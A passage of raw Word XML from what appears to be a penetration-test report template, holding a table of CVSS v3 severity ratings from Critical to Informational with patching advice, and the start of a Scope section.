              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="808080"/>
          </w:tcPr>
          <w:p w14:paraId="6F088C05" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:eastAsia="Century Gothic" w:hAnsi="Century Gothic" w:cs="Century Gothic"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:eastAsia="Century Gothic" w:hAnsi="Century Gothic" w:cs="Century Gothic"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1620" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="808080"/>
          </w:tcPr>
          <w:p w14:paraId="35F08624" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:eastAsia="Century Gothic" w:hAnsi="Century Gothic" w:cs="Century Gothic"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:eastAsia="Century Gothic" w:hAnsi="Century Gothic" w:cs="Century Gothic"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>CVSS V3 Score Range</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6570" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="808080"/>
          </w:tcPr>
          <w:p w14:paraId="6756E353" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:eastAsia="Century Gothic" w:hAnsi="Century Gothic" w:cs="Century Gothic"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:eastAsia="Century Gothic" w:hAnsi="Century Gothic" w:cs="Century Gothic"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Definition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="5E6A6A8A" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="709"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1884" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5D1E1E61" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1620" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="67805A3C" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9.0-10.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6570" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="42129852" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Exploitation is straightforward and usually results in system-level compromise.  It is advised to form a plan of action and patch immediately.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="03AE4E93" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="699"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1884" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3386076D" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1620" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="37D7AB87" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>7.0-8.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6570" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="67DC2618" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Exploitation is more difficult but could cause elevated privileges and potentially a loss of data or downtime.  It is advised to form a plan of action and patch as soon as possible.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="566DDE72" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="709"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1884"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51090770" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Moderate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1620" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="626F29B4" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>4.0-6.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6570" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5D9FCC4F" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Vulnerabilities exist but are not exploitable or require extra steps such as social engineering.  It is advised to form a plan of action and patch after high-priority issues have been resolved.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="53ACE28E" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="548"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1884" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4FFB9CE5" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1620" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="02BEE319" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>0.1-3.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6570" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="701AEAC1" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Vulnerabilities are non-exploitable but would reduce an organization’s attack surface.  It is advised to form a plan of action and patch during the next maintenance window.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="7631DF6B" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="709"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1884" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="0070C0"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2A7C367B" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Informational</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1620" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7A42DECD" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6570" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="726A61AB" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>No vulnerability exists.  Additional information is provided regarding items noticed during testing, strong controls, and additional documentation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="72550746" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_heading=h.1fob9te" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="43050EED" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_heading=h.4s4u8kiklfr8" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341A75BC" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
          <w:color w:val="000000"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76238CC1" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
          <w:color w:val="000000"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a2"/>
        <w:tblW w:w="9570" w:type="dxa"/>
